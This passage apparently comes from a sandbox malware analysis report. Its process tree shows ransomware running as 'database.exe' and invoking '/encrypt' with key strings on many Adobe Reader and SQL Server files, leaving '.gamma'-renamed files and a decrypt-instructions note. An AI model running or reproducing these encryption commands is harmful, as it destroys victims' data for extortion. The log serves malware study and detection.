                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcese35.dll"
                                                                                                                                  5⤵
                                                                                                                                    PID:3804
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#Decrypt_Files_ReadMe#.rtf"
                                                                                                                                    5⤵
                                                                                                                                      PID:1428
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:1136
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ACE.dll"
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1556
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Acrofx32.dll"
                                                                                                                                        5⤵
                                                                                                                                          PID:6068
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:4660
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRdIF.dll"
                                                                                                                                            5⤵
                                                                                                                                              PID:268
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:5452
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:1740
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5944
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2604
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3700
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\authplay.dll"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4768
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:956
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:3920
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIBUtils.dll"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:3788
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ccme_base.dll"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4268
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CoolType.dll"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4088
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6036
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4016
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:3812
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll"
                                                                                                                                                                          5⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:3420
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
